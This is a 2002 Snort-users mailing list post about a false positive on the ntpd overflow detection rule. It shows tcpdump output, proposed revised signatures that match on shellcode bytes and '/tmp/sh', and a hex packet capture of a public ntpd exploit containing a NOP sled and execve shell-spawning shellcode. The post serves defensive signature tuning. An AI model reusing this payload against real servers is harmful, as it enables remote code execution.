[Snort-users] ntpdx overflow attempt sig triggered by ntpdc query

james jamesh at ...3784...
Tue Dec 17 07:43:00 EST 2002


I was able to trigger this rule by doing "ntpdc -c peers <peer address>"
Ntpdc used is the current version of NTP & NTPD by David Mills.
The RON box we host set this off and the researcher pointed out
to me this was just a ntpdc query from him.

[**] [1:312:2] EXPLOIT ntpdx overflow attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
12/14-00:58:02.732689 mrtg:57985 -> tarpit:123
UDP TTL:64 TOS:0x0 ID:34983 IpLen:20 DgmLen:188 DF
Len: 168
[Xref => bugtraq 2540][Xref => arachnids 492]

alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx
overflow attempt"; dsize: >128; reference:arachnids,492;
reference:bugtraq,2540; classtype:attempted-admin; sid:312; rev:2;)

My hacked rule revisions, comments please

alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx
overflow attempt"; dsize: >188;\
content:"|80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90
90|";reference:arachnids,492; reference:bugtraq,2540;
classtype:attempted-admin; sid:312;\ rev:3;)
or
alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx
overflow attempt"; dsize: >188;\
content:"/tmp/sh";reference:arachnids,492; reference:bugtraq,2540;
classtype:attempted-admin; sid:312; rev:3;)


[root at ...7751...]# ntpdc -c peers mrtg

[root at ...7752... james]# tcpdump -v -E type host mrtg and udp port 123
tcpdump: listening on eth0
03:19:30.262385 tarpit.58596 > mrtg..ntp:  [len=160] v2 res2 strat 0
poll 2 prec 1 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig
0.000000000 rec -0.000000000 xmt -0.000000000 (DF) (ttl 64, id 31704,
len 188)
03:19:30.262442 tarpit.58596 > mrtg.ntp:  [len=160] v2 res2 strat 0 poll
2 prec 1 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig
0.000000000 rec -0.000000000 xmt -0.000000000 (DF) (ttl 63, id 31704,
len 188)
03:19:30.262970 mrtg.ntp > tarpit.58596:  [len=136] v2 -1s res2 strat 0
poll 2 prec 1 dist 4.000488 disp 16659.015945 ref
(unspec)@8061450.042957365 orig 38.000000000 rec +10622733.000000226 xmt
+83886042.254196226 (DF) [tos 0x10]  (ttl 64, id 0, len 164)
03:19:30.263110 mrtg.ntp > tarpit.58596:  [len=136] v2 -1s res2 strat 0
poll 2 prec 1 dist 4.000488 disp 16659.015945 ref
(unspec)@8061450.042957365 orig 38.000000000 rec +10622733.000000226 xmt
+83886042.254196226 (DF) [tos 0x10]  (ttl 63, id 0, len 164)

All other ntp query types I tried were less than len 188

Exploit, from Whitehats:

This is a trace of the ntp exploit "ntpd-exp.c" found on
securityfocus.com which was written by babcia padlina ltd.

04/09-12:28:17.176237 192.0.0.10:1109 -> 192.0.0.1:123
UDP TTL:64 TOS:0x0 ID:60376 IpLen:20 DgmLen:540
Len: 520
16 02 00 01 00 00 00 00 00 00 01 36 73 74 72 61  ...........6stra
74 75 6D 3D 90 90 90 90 90 90 90 90 90 90 90 90  tum=............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
EB 1F 5E 89 76 08 31 C0 88 46 07 89 46 0C B0 0B  ..^.v.1..F..F...
89 F3 8D 4E 08 8D 56 0C CD 80 31 DB 89 D8 40 CD  ...N..V...1... at ...843...
80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90  ....../tmp/sh...
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
77 F7 FF BF 77 F7 FF BF 90 90 90 90 90 90 90 90  w...w...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................






More information about the Snort-users mailing list